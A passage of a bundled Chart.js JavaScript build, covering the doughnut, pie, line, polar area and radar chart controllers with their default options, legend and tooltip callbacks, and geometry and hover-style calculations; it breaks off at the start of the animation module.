// Boolean - Whether we animate the rotation of the Doughnut
animateRotate: true,
// Boolean - Whether we animate scaling the Doughnut from the centre
animateScale: false
},
aspectRatio: 1,
hover: {
mode: 'single'
},
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
var data = chart.data;
var datasets = data.datasets;
var labels = data.labels;
if (datasets.length) {
for (var i = 0; i < datasets[0].data.length; ++i) {
text.push('<li><span style="background-color:' + datasets[0].backgroundColor[i] + '"></span>');
if (labels[i]) {
text.push(labels[i]);
}
text.push('</li>');
}
}
text.push('</ul>');
return text.join('');
},
legend: {
labels: {
generateLabels: function (chart) {
var data = chart.data;
if (data.labels.length && data.datasets.length) {
return data.labels.map(function (label, i) {
var meta = chart.getDatasetMeta(0);
var ds = data.datasets[0];
var arc = meta.data[i];
var custom = arc && arc.custom || {};
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var arcOpts = chart.options.elements.arc;
var fill = custom.backgroundColor ? custom.backgroundColor : getValueAtIndexOrDefault(ds.backgroundColor, i, arcOpts.backgroundColor);
var stroke = custom.borderColor ? custom.borderColor : getValueAtIndexOrDefault(ds.borderColor, i, arcOpts.borderColor);
var bw = custom.borderWidth ? custom.borderWidth : getValueAtIndexOrDefault(ds.borderWidth, i, arcOpts.borderWidth);
return {
text: label,
fillStyle: fill,
strokeStyle: stroke,
lineWidth: bw,
hidden: isNaN(ds.data[i]) || meta.data[i].hidden,
// Extra data used for toggling the correct item
index: i
};
});
}
return [];
}
},
onClick: function (e, legendItem) {
var index = legendItem.index;
var chart = this.chart;
var i, ilen, meta;
for (i = 0, ilen = (chart.data.datasets || []).length; i < ilen; ++i) {
meta = chart.getDatasetMeta(i);
// toggle visibility of index if exists
if (meta.data[index]) {
meta.data[index].hidden = !meta.data[index].hidden;
}
}
chart.update();
}
},
// The percentage of the chart that we cut out of the middle.
cutoutPercentage: 50,
// The rotation of the chart, where the first data arc begins.
rotation: Math.PI * -0.5,
// The total circumference of the chart.
circumference: Math.PI * 2.0,
// Need to override these to give a nice default
tooltips: {
callbacks: {
title: function () {
return '';
},
label: function (tooltipItem, data) {
var dataLabel = data.labels[tooltipItem.index];
var value = ': ' + data.datasets[tooltipItem.datasetIndex].data[tooltipItem.index];
if (helpers.isArray(dataLabel)) {
// show value on first line of multiline label
// need to clone because we are changing the value
dataLabel = dataLabel.slice();
dataLabel[0] += value;
} else {
dataLabel += value;
}
return dataLabel;
}
}
}
};
defaults.pie = helpers.clone(defaults.doughnut);
helpers.extend(defaults.pie, {
cutoutPercentage: 0
});
Chart.controllers.doughnut = Chart.controllers.pie = Chart.DatasetController.extend({
dataElementType: Chart.elements.Arc,
linkScales: helpers.noop,
// Get index of the dataset in relation to the visible datasets. This allows determining the inner and outer radius correctly
getRingIndex: function (datasetIndex) {
var ringIndex = 0;
for (var j = 0; j < datasetIndex; ++j) {
if (this.chart.isDatasetVisible(j)) {
++ringIndex;
}
}
return ringIndex;
},
update: function (reset) {
var me = this;
var chart = me.chart,
chartArea = chart.chartArea,
opts = chart.options,
arcOpts = opts.elements.arc,
availableWidth = chartArea.right - chartArea.left - arcOpts.borderWidth,
availableHeight = chartArea.bottom - chartArea.top - arcOpts.borderWidth,
minSize = Math.min(availableWidth, availableHeight),
offset = {
x: 0,
y: 0
},
meta = me.getMeta(),
cutoutPercentage = opts.cutoutPercentage,
circumference = opts.circumference;
// If the chart's circumference isn't a full circle, calculate minSize as a ratio of the width/height of the arc
if (circumference < Math.PI * 2.0) {
var startAngle = opts.rotation % (Math.PI * 2.0);
startAngle += Math.PI * 2.0 * (startAngle >= Math.PI ? -1 : startAngle < -Math.PI ? 1 : 0);
var endAngle = startAngle + circumference;
var start = {x: Math.cos(startAngle), y: Math.sin(startAngle)};
var end = {x: Math.cos(endAngle), y: Math.sin(endAngle)};
var contains0 = (startAngle <= 0 && 0 <= endAngle) || (startAngle <= Math.PI * 2.0 && Math.PI * 2.0 <= endAngle);
var contains90 = (startAngle <= Math.PI * 0.5 && Math.PI * 0.5 <= endAngle) || (startAngle <= Math.PI * 2.5 && Math.PI * 2.5 <= endAngle);
var contains180 = (startAngle <= -Math.PI && -Math.PI <= endAngle) || (startAngle <= Math.PI && Math.PI <= endAngle);
var contains270 = (startAngle <= -Math.PI * 0.5 && -Math.PI * 0.5 <= endAngle) || (startAngle <= Math.PI * 1.5 && Math.PI * 1.5 <= endAngle);
var cutout = cutoutPercentage / 100.0;
var min = {
x: contains180 ? -1 : Math.min(start.x * (start.x < 0 ? 1 : cutout), end.x * (end.x < 0 ? 1 : cutout)),
y: contains270 ? -1 : Math.min(start.y * (start.y < 0 ? 1 : cutout), end.y * (end.y < 0 ? 1 : cutout))
};
var max = {
x: contains0 ? 1 : Math.max(start.x * (start.x > 0 ? 1 : cutout), end.x * (end.x > 0 ? 1 : cutout)),
y: contains90 ? 1 : Math.max(start.y * (start.y > 0 ? 1 : cutout), end.y * (end.y > 0 ? 1 : cutout))
};
var size = {width: (max.x - min.x) * 0.5, height: (max.y - min.y) * 0.5};
minSize = Math.min(availableWidth / size.width, availableHeight / size.height);
offset = {x: (max.x + min.x) * -0.5, y: (max.y + min.y) * -0.5};
}
chart.borderWidth = me.getMaxBorderWidth(meta.data);
chart.outerRadius = Math.max((minSize - chart.borderWidth) / 2, 0);
chart.innerRadius = Math.max(cutoutPercentage ? (chart.outerRadius / 100) * (cutoutPercentage) : 1, 0);
chart.radiusLength = (chart.outerRadius - chart.innerRadius) / chart.getVisibleDatasetCount();
chart.offsetX = offset.x * chart.outerRadius;
chart.offsetY = offset.y * chart.outerRadius;
meta.total = me.calculateTotal();
me.outerRadius = chart.outerRadius - (chart.radiusLength * me.getRingIndex(me.index));
me.innerRadius = me.outerRadius - chart.radiusLength;
helpers.each(meta.data, function (arc, index) {
me.updateElement(arc, index, reset);
});
},
updateElement: function (arc, index, reset) {
var me = this;
var chart = me.chart,
chartArea = chart.chartArea,
opts = chart.options,
animationOpts = opts.animation,
centerX = (chartArea.left + chartArea.right) / 2,
centerY = (chartArea.top + chartArea.bottom) / 2,
startAngle = opts.rotation, // non reset case handled later
endAngle = opts.rotation, // non reset case handled later
dataset = me.getDataset(),
circumference = reset && animationOpts.animateRotate ? 0 : arc.hidden ? 0 : me.calculateCircumference(dataset.data[index]) * (opts.circumference / (2.0 * Math.PI)),
innerRadius = reset && animationOpts.animateScale ? 0 : me.innerRadius,
outerRadius = reset && animationOpts.animateScale ? 0 : me.outerRadius,
valueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
helpers.extend(arc, {
// Utility
_datasetIndex: me.index,
_index: index,
// Desired view properties
_model: {
x: centerX + chart.offsetX,
y: centerY + chart.offsetY,
startAngle: startAngle,
endAngle: endAngle,
circumference: circumference,
outerRadius: outerRadius,
innerRadius: innerRadius,
label: valueAtIndexOrDefault(dataset.label, index, chart.data.labels[index])
}
});
var model = arc._model;
// Resets the visual styles
this.removeHoverStyle(arc);
// Set correct angles if not resetting
if (!reset || !animationOpts.animateRotate) {
if (index === 0) {
model.startAngle = opts.rotation;
} else {
model.startAngle = me.getMeta().data[index - 1]._model.endAngle;
}
model.endAngle = model.startAngle + model.circumference;
}
arc.pivot();
},
removeHoverStyle: function (arc) {
Chart.DatasetController.prototype.removeHoverStyle.call(this, arc, this.chart.options.elements.arc);
},
calculateTotal: function () {
var dataset = this.getDataset();
var meta = this.getMeta();
var total = 0;
var value;
helpers.each(meta.data, function (element, index) {
value = dataset.data[index];
if (!isNaN(value) && !element.hidden) {
total += Math.abs(value);
}
});
/* if (total === 0) {
total = NaN;
}*/
return total;
},
calculateCircumference: function (value) {
var total = this.getMeta().total;
if (total > 0 && !isNaN(value)) {
return (Math.PI * 2.0) * (value / total);
}
return 0;
},
// gets the max border or hover width to properly scale pie charts
getMaxBorderWidth: function (elements) {
var max = 0,
index = this.index,
length = elements.length,
borderWidth,
hoverWidth;
for (var i = 0; i < length; i++) {
borderWidth = elements[i]._model ? elements[i]._model.borderWidth : 0;
hoverWidth = elements[i]._chart ? elements[i]._chart.config.data.datasets[index].hoverBorderWidth : 0;
max = borderWidth > max ? borderWidth : max;
max = hoverWidth > max ? hoverWidth : max;
}
return max;
}
});
};
}, {}], 18: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.line = {
showLines: true,
spanGaps: false,
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'category',
id: 'x-axis-0'
}],
yAxes: [{
type: 'linear',
id: 'y-axis-0'
}]
}
};
function lineEnabled(dataset, options) {
return helpers.getValueOrDefault(dataset.showLine, options.showLines);
}
Chart.controllers.line = Chart.DatasetController.extend({
datasetElementType: Chart.elements.Line,
dataElementType: Chart.elements.Point,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var line = meta.dataset;
var points = meta.data || [];
var options = me.chart.options;
var lineElementOptions = options.elements.line;
var scale = me.getScaleForId(meta.yAxisID);
var i, ilen, custom;
var dataset = me.getDataset();
var showLine = lineEnabled(dataset, options);
// Update Line
if (showLine) {
custom = line.custom || {};
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.tension !== undefined) && (dataset.lineTension === undefined)) {
dataset.lineTension = dataset.tension;
}
// Utility
line._scale = scale;
line._datasetIndex = me.index;
// Data
line._children = points;
// Model
line._model = {
// Appearance
// The default behavior of lines is to break at null values, according
// to https://github.com/chartjs/Chart.js/issues/2435#issuecomment-216718158
// This option gives lines the ability to span gaps
spanGaps: dataset.spanGaps ? dataset.spanGaps : options.spanGaps,
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.lineTension, lineElementOptions.tension),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : (dataset.backgroundColor || lineElementOptions.backgroundColor),
borderWidth: custom.borderWidth ? custom.borderWidth : (dataset.borderWidth || lineElementOptions.borderWidth),
borderColor: custom.borderColor ? custom.borderColor : (dataset.borderColor || lineElementOptions.borderColor),
borderCapStyle: custom.borderCapStyle ? custom.borderCapStyle : (dataset.borderCapStyle || lineElementOptions.borderCapStyle),
borderDash: custom.borderDash ? custom.borderDash : (dataset.borderDash || lineElementOptions.borderDash),
borderDashOffset: custom.borderDashOffset ? custom.borderDashOffset : (dataset.borderDashOffset || lineElementOptions.borderDashOffset),
borderJoinStyle: custom.borderJoinStyle ? custom.borderJoinStyle : (dataset.borderJoinStyle || lineElementOptions.borderJoinStyle),
fill: custom.fill ? custom.fill : (dataset.fill !== undefined ? dataset.fill : lineElementOptions.fill),
steppedLine: custom.steppedLine ? custom.steppedLine : helpers.getValueOrDefault(dataset.steppedLine, lineElementOptions.stepped),
cubicInterpolationMode: custom.cubicInterpolationMode ? custom.cubicInterpolationMode : helpers.getValueOrDefault(dataset.cubicInterpolationMode, lineElementOptions.cubicInterpolationMode),
// Scale
scaleTop: scale.top,
scaleBottom: scale.bottom,
scaleZero: scale.getBasePixel()
};
line.pivot();
}
// Update Points
for (i = 0, ilen = points.length; i < ilen; ++i) {
me.updateElement(points[i], i, reset);
}
if (showLine && line._model.tension !== 0) {
me.updateBezierControlPoints();
}
// Now pivot the point for animation
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].pivot();
}
},
getPointBackgroundColor: function (point, index) {
var backgroundColor = this.chart.options.elements.point.backgroundColor;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.backgroundColor) {
backgroundColor = custom.backgroundColor;
} else if (dataset.pointBackgroundColor) {
backgroundColor = helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, backgroundColor);
} else if (dataset.backgroundColor) {
backgroundColor = dataset.backgroundColor;
}
return backgroundColor;
},
getPointBorderColor: function (point, index) {
var borderColor = this.chart.options.elements.point.borderColor;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.borderColor) {
borderColor = custom.borderColor;
} else if (dataset.pointBorderColor) {
borderColor = helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, borderColor);
} else if (dataset.borderColor) {
borderColor = dataset.borderColor;
}
return borderColor;
},
getPointBorderWidth: function (point, index) {
var borderWidth = this.chart.options.elements.point.borderWidth;
var dataset = this.getDataset();
var custom = point.custom || {};
if (custom.borderWidth) {
borderWidth = custom.borderWidth;
} else if (dataset.pointBorderWidth) {
borderWidth = helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, borderWidth);
} else if (dataset.borderWidth) {
borderWidth = dataset.borderWidth;
}
return borderWidth;
},
updateElement: function (point, index, reset) {
var me = this;
var meta = me.getMeta();
var custom = point.custom || {};
var dataset = me.getDataset();
var datasetIndex = me.index;
var value = dataset.data[index];
var yScale = me.getScaleForId(meta.yAxisID);
var xScale = me.getScaleForId(meta.xAxisID);
var pointOptions = me.chart.options.elements.point;
var x, y;
var labels = me.chart.data.labels || [];
var includeOffset = (labels.length === 1 || dataset.data.length === 1) || me.chart.isCombo;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.radius !== undefined) && (dataset.pointRadius === undefined)) {
dataset.pointRadius = dataset.radius;
}
if ((dataset.hitRadius !== undefined) && (dataset.pointHitRadius === undefined)) {
dataset.pointHitRadius = dataset.hitRadius;
}
x = xScale.getPixelForValue(typeof value === 'object' ? value : NaN, index, datasetIndex, includeOffset);
y = reset ? yScale.getBasePixel() : me.calculatePointY(value, index, datasetIndex);
// Utility
point._xScale = xScale;
point._yScale = yScale;
point._datasetIndex = datasetIndex;
point._index = index;
// Desired view properties
point._model = {
x: x,
y: y,
skip: custom.skip || isNaN(x) || isNaN(y),
// Appearance
radius: custom.radius || helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, pointOptions.radius),
pointStyle: custom.pointStyle || helpers.getValueAtIndexOrDefault(dataset.pointStyle, index, pointOptions.pointStyle),
backgroundColor: me.getPointBackgroundColor(point, index),
borderColor: me.getPointBorderColor(point, index),
borderWidth: me.getPointBorderWidth(point, index),
tension: meta.dataset._model ? meta.dataset._model.tension : 0,
steppedLine: meta.dataset._model ? meta.dataset._model.steppedLine : false,
// Tooltip
hitRadius: custom.hitRadius || helpers.getValueAtIndexOrDefault(dataset.pointHitRadius, index, pointOptions.hitRadius)
};
},
calculatePointY: function (value, index, datasetIndex) {
var me = this;
var chart = me.chart;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var sumPos = 0;
var sumNeg = 0;
var i, ds, dsMeta;
if (yScale.options.stacked) {
for (i = 0; i < datasetIndex; i++) {
ds = chart.data.datasets[i];
dsMeta = chart.getDatasetMeta(i);
if (dsMeta.type === 'line' && dsMeta.yAxisID === yScale.id && chart.isDatasetVisible(i)) {
var stackedRightValue = Number(yScale.getRightValue(ds.data[index]));
if (stackedRightValue < 0) {
sumNeg += stackedRightValue || 0;
} else {
sumPos += stackedRightValue || 0;
}
}
}
var rightValue = Number(yScale.getRightValue(value));
if (rightValue < 0) {
return yScale.getPixelForValue(sumNeg + rightValue);
}
return yScale.getPixelForValue(sumPos + rightValue);
}
return yScale.getPixelForValue(value);
},
updateBezierControlPoints: function () {
var me = this;
var meta = me.getMeta();
var area = me.chart.chartArea;
var points = (meta.data || []);
var i, ilen, point, model, controlPoints;
// Only consider points that are drawn in case the spanGaps option is used
if (meta.dataset._model.spanGaps) {
points = points.filter(function (pt) {
return !pt._model.skip;
});
}
function capControlPoint(pt, min, max) {
return Math.max(Math.min(pt, max), min);
}
if (meta.dataset._model.cubicInterpolationMode === 'monotone') {
helpers.splineCurveMonotone(points);
} else {
for (i = 0, ilen = points.length; i < ilen; ++i) {
point = points[i];
model = point._model;
controlPoints = helpers.splineCurve(
helpers.previousItem(points, i)._model,
model,
helpers.nextItem(points, i)._model,
meta.dataset._model.tension
);
model.controlPointPreviousX = controlPoints.previous.x;
model.controlPointPreviousY = controlPoints.previous.y;
model.controlPointNextX = controlPoints.next.x;
model.controlPointNextY = controlPoints.next.y;
}
}
if (me.chart.options.elements.line.capBezierPoints) {
for (i = 0, ilen = points.length; i < ilen; ++i) {
model = points[i]._model;
model.controlPointPreviousX = capControlPoint(model.controlPointPreviousX, area.left, area.right);
model.controlPointPreviousY = capControlPoint(model.controlPointPreviousY, area.top, area.bottom);
model.controlPointNextX = capControlPoint(model.controlPointNextX, area.left, area.right);
model.controlPointNextY = capControlPoint(model.controlPointNextY, area.top, area.bottom);
}
}
},
draw: function (ease) {
var me = this;
var meta = me.getMeta();
var points = meta.data || [];
var easingDecimal = ease || 1;
var i, ilen;
// Transition Point Locations
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].transition(easingDecimal);
}
// Transition and Draw the line
if (lineEnabled(me.getDataset(), me.chart.options)) {
meta.dataset.transition(easingDecimal).draw();
}
// Draw the points
for (i = 0, ilen = points.length; i < ilen; ++i) {
points[i].draw();
}
},
setHoverStyle: function (point) {
// Point
var dataset = this.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
model.radius = custom.hoverRadius || helpers.getValueAtIndexOrDefault(dataset.pointHoverRadius, index, this.chart.options.elements.point.hoverRadius);
model.backgroundColor = custom.hoverBackgroundColor || helpers.getValueAtIndexOrDefault(dataset.pointHoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor || helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth || helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (point) {
var me = this;
var dataset = me.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.radius !== undefined) && (dataset.pointRadius === undefined)) {
dataset.pointRadius = dataset.radius;
}
model.radius = custom.radius || helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, me.chart.options.elements.point.radius);
model.backgroundColor = me.getPointBackgroundColor(point, index);
model.borderColor = me.getPointBorderColor(point, index);
model.borderWidth = me.getPointBorderWidth(point, index);
}
});
};
}, {}], 19: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.polarArea = {
scale: {
type: 'radialLinear',
lineArc: true, // so that lines are circular
ticks: {
beginAtZero: true
}
},
// Boolean - Whether to animate the rotation of the chart
animation: {
animateRotate: true,
animateScale: true
},
startAngle: -0.5 * Math.PI,
aspectRatio: 1,
legendCallback: function (chart) {
var text = [];
text.push('<ul class="' + chart.id + '-legend">');
var data = chart.data;
var datasets = data.datasets;
var labels = data.labels;
if (datasets.length) {
for (var i = 0; i < datasets[0].data.length; ++i) {
text.push('<li><span style="background-color:' + datasets[0].backgroundColor[i] + '"></span>');
if (labels[i]) {
text.push(labels[i]);
}
text.push('</li>');
}
}
text.push('</ul>');
return text.join('');
},
legend: {
labels: {
generateLabels: function (chart) {
var data = chart.data;
if (data.labels.length && data.datasets.length) {
return data.labels.map(function (label, i) {
var meta = chart.getDatasetMeta(0);
var ds = data.datasets[0];
var arc = meta.data[i];
var custom = arc.custom || {};
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var arcOpts = chart.options.elements.arc;
var fill = custom.backgroundColor ? custom.backgroundColor : getValueAtIndexOrDefault(ds.backgroundColor, i, arcOpts.backgroundColor);
var stroke = custom.borderColor ? custom.borderColor : getValueAtIndexOrDefault(ds.borderColor, i, arcOpts.borderColor);
var bw = custom.borderWidth ? custom.borderWidth : getValueAtIndexOrDefault(ds.borderWidth, i, arcOpts.borderWidth);
return {
text: label,
fillStyle: fill,
strokeStyle: stroke,
lineWidth: bw,
hidden: isNaN(ds.data[i]) || meta.data[i].hidden,
// Extra data used for toggling the correct item
index: i
};
});
}
return [];
}
},
onClick: function (e, legendItem) {
var index = legendItem.index;
var chart = this.chart;
var i, ilen, meta;
for (i = 0, ilen = (chart.data.datasets || []).length; i < ilen; ++i) {
meta = chart.getDatasetMeta(i);
meta.data[index].hidden = !meta.data[index].hidden;
}
chart.update();
}
},
// Need to override these to give a nice default
tooltips: {
callbacks: {
title: function () {
return '';
},
label: function (tooltipItem, data) {
return data.labels[tooltipItem.index] + ': ' + tooltipItem.yLabel;
}
}
}
};
Chart.controllers.polarArea = Chart.DatasetController.extend({
dataElementType: Chart.elements.Arc,
linkScales: helpers.noop,
update: function (reset) {
var me = this;
var chart = me.chart;
var chartArea = chart.chartArea;
var meta = me.getMeta();
var opts = chart.options;
var arcOpts = opts.elements.arc;
var minSize = Math.min(chartArea.right - chartArea.left, chartArea.bottom - chartArea.top);
chart.outerRadius = Math.max((minSize - arcOpts.borderWidth / 2) / 2, 0);
chart.innerRadius = Math.max(opts.cutoutPercentage ? (chart.outerRadius / 100) * (opts.cutoutPercentage) : 1, 0);
chart.radiusLength = (chart.outerRadius - chart.innerRadius) / chart.getVisibleDatasetCount();
me.outerRadius = chart.outerRadius - (chart.radiusLength * me.index);
me.innerRadius = me.outerRadius - chart.radiusLength;
meta.count = me.countVisibleElements();
helpers.each(meta.data, function (arc, index) {
me.updateElement(arc, index, reset);
});
},
updateElement: function (arc, index, reset) {
var me = this;
var chart = me.chart;
var dataset = me.getDataset();
var opts = chart.options;
var animationOpts = opts.animation;
var scale = chart.scale;
var getValueAtIndexOrDefault = helpers.getValueAtIndexOrDefault;
var labels = chart.data.labels;
var circumference = me.calculateCircumference(dataset.data[index]);
var centerX = scale.xCenter;
var centerY = scale.yCenter;
// If there is NaN data before us, we need to calculate the starting angle correctly.
// We could be way more efficient here, but its unlikely that the polar area chart will have a lot of data
var visibleCount = 0;
var meta = me.getMeta();
for (var i = 0; i < index; ++i) {
if (!isNaN(dataset.data[i]) && !meta.data[i].hidden) {
++visibleCount;
}
}
// var negHalfPI = -0.5 * Math.PI;
var datasetStartAngle = opts.startAngle;
var distance = arc.hidden ? 0 : scale.getDistanceFromCenterForValue(dataset.data[index]);
var startAngle = datasetStartAngle + (circumference * visibleCount);
var endAngle = startAngle + (arc.hidden ? 0 : circumference);
var resetRadius = animationOpts.animateScale ? 0 : scale.getDistanceFromCenterForValue(dataset.data[index]);
helpers.extend(arc, {
// Utility
_datasetIndex: me.index,
_index: index,
_scale: scale,
// Desired view properties
_model: {
x: centerX,
y: centerY,
innerRadius: 0,
outerRadius: reset ? resetRadius : distance,
startAngle: reset && animationOpts.animateRotate ? datasetStartAngle : startAngle,
endAngle: reset && animationOpts.animateRotate ? datasetStartAngle : endAngle,
label: getValueAtIndexOrDefault(labels, index, labels[index])
}
});
// Apply border and fill style
me.removeHoverStyle(arc);
arc.pivot();
},
removeHoverStyle: function (arc) {
Chart.DatasetController.prototype.removeHoverStyle.call(this, arc, this.chart.options.elements.arc);
},
countVisibleElements: function () {
var dataset = this.getDataset();
var meta = this.getMeta();
var count = 0;
helpers.each(meta.data, function (element, index) {
if (!isNaN(dataset.data[index]) && !element.hidden) {
count++;
}
});
return count;
},
calculateCircumference: function (value) {
var count = this.getMeta().count;
if (count > 0 && !isNaN(value)) {
return (2 * Math.PI) / count;
}
return 0;
}
});
};
}, {}], 20: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.radar = {
aspectRatio: 1,
scale: {
type: 'radialLinear'
},
elements: {
line: {
tension: 0 // no bezier in radar
}
}
};
Chart.controllers.radar = Chart.DatasetController.extend({
datasetElementType: Chart.elements.Line,
dataElementType: Chart.elements.Point,
linkScales: helpers.noop,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var line = meta.dataset;
var points = meta.data;
var custom = line.custom || {};
var dataset = me.getDataset();
var lineElementOptions = me.chart.options.elements.line;
var scale = me.chart.scale;
// Compatibility: If the properties are defined with only the old name, use those values
if ((dataset.tension !== undefined) && (dataset.lineTension === undefined)) {
dataset.lineTension = dataset.tension;
}
helpers.extend(meta.dataset, {
// Utility
_datasetIndex: me.index,
// Data
_children: points,
_loop: true,
// Model
_model: {
// Appearance
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.lineTension, lineElementOptions.tension),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : (dataset.backgroundColor || lineElementOptions.backgroundColor),
borderWidth: custom.borderWidth ? custom.borderWidth : (dataset.borderWidth || lineElementOptions.borderWidth),
borderColor: custom.borderColor ? custom.borderColor : (dataset.borderColor || lineElementOptions.borderColor),
fill: custom.fill ? custom.fill : (dataset.fill !== undefined ? dataset.fill : lineElementOptions.fill),
borderCapStyle: custom.borderCapStyle ? custom.borderCapStyle : (dataset.borderCapStyle || lineElementOptions.borderCapStyle),
borderDash: custom.borderDash ? custom.borderDash : (dataset.borderDash || lineElementOptions.borderDash),
borderDashOffset: custom.borderDashOffset ? custom.borderDashOffset : (dataset.borderDashOffset || lineElementOptions.borderDashOffset),
borderJoinStyle: custom.borderJoinStyle ? custom.borderJoinStyle : (dataset.borderJoinStyle || lineElementOptions.borderJoinStyle),
// Scale
scaleTop: scale.top,
scaleBottom: scale.bottom,
scaleZero: scale.getBasePosition()
}
});
meta.dataset.pivot();
// Update Points
helpers.each(points, function (point, index) {
me.updateElement(point, index, reset);
}, me);
// Update bezier control points
me.updateBezierControlPoints();
},
updateElement: function (point, index, reset) {
var me = this;
var custom = point.custom || {};
var dataset = me.getDataset();
var scale = me.chart.scale;
var pointElementOptions = me.chart.options.elements.point;
var pointPosition = scale.getPointPositionForValue(index, dataset.data[index]);
helpers.extend(point, {
// Utility
_datasetIndex: me.index,
_index: index,
_scale: scale,
// Desired view properties
_model: {
x: reset ? scale.xCenter : pointPosition.x, // value not used in dataset scale, but we want a consistent API between scales
y: reset ? scale.yCenter : pointPosition.y,
// Appearance
tension: custom.tension ? custom.tension : helpers.getValueOrDefault(dataset.tension, me.chart.options.elements.line.tension),
radius: custom.radius ? custom.radius : helpers.getValueAtIndexOrDefault(dataset.pointRadius, index, pointElementOptions.radius),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, pointElementOptions.backgroundColor),
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, pointElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, pointElementOptions.borderWidth),
pointStyle: custom.pointStyle ? custom.pointStyle : helpers.getValueAtIndexOrDefault(dataset.pointStyle, index, pointElementOptions.pointStyle),
// Tooltip
hitRadius: custom.hitRadius ? custom.hitRadius : helpers.getValueAtIndexOrDefault(dataset.hitRadius, index, pointElementOptions.hitRadius)
}
});
point._model.skip = custom.skip ? custom.skip : (isNaN(point._model.x) || isNaN(point._model.y));
},
updateBezierControlPoints: function () {
var chartArea = this.chart.chartArea;
var meta = this.getMeta();
helpers.each(meta.data, function (point, index) {
var model = point._model;
var controlPoints = helpers.splineCurve(
helpers.previousItem(meta.data, index, true)._model,
model,
helpers.nextItem(meta.data, index, true)._model,
model.tension
);
// Prevent the bezier going outside of the bounds of the graph
model.controlPointPreviousX = Math.max(Math.min(controlPoints.previous.x, chartArea.right), chartArea.left);
model.controlPointPreviousY = Math.max(Math.min(controlPoints.previous.y, chartArea.bottom), chartArea.top);
model.controlPointNextX = Math.max(Math.min(controlPoints.next.x, chartArea.right), chartArea.left);
model.controlPointNextY = Math.max(Math.min(controlPoints.next.y, chartArea.bottom), chartArea.top);
// Now pivot the point for animation
point.pivot();
});
},
draw: function (ease) {
var meta = this.getMeta();
var easingDecimal = ease || 1;
// Transition Point Locations
helpers.each(meta.data, function (point) {
point.transition(easingDecimal);
});
// Transition and Draw the line
meta.dataset.transition(easingDecimal).draw();
// Draw the points
helpers.each(meta.data, function (point) {
point.draw();
});
},
setHoverStyle: function (point) {
// Point
var dataset = this.chart.data.datasets[point._datasetIndex];
var custom = point.custom || {};
var index = point._index;
var model = point._model;
model.radius = custom.hoverRadius ? custom.hoverRadius : helpers.getValueAtIndexOrDefault(dataset.pointHoverRadius, index, this.chart.options.elements.point.hoverRadius);
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointHoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : helpers.getValueAtIndexOrDefault(dataset.pointHoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (point) {
var dataset = this.chart.data.datasets[point._datasetIndex];
var custom = point.custom || {};
var index = point._index;
var model = point._model;
var pointElementOptions = this.chart.options.elements.point;
model.radius = custom.radius ? custom.radius : helpers.getValueAtIndexOrDefault(dataset.radius, index, pointElementOptions.radius);
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.pointBackgroundColor, index, pointElementOptions.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.pointBorderColor, index, pointElementOptions.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.pointBorderWidth, index, pointElementOptions.borderWidth);
}
});
};
}, {}], 21: [function (require, module, exports) {
/* global window: false */
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.global.animation = {
duration: 1000,
easing: 'easeOutQuart',
onProgress: helpers.noop,
onComplete: helpers.noop
};
Chart.Animation = Chart.Element.extend({
currentStep: null, // the current animation step
numSteps: 60, // default number of steps
easing: '', // the easing to use for this animation
render: null, // render function used by the animation service
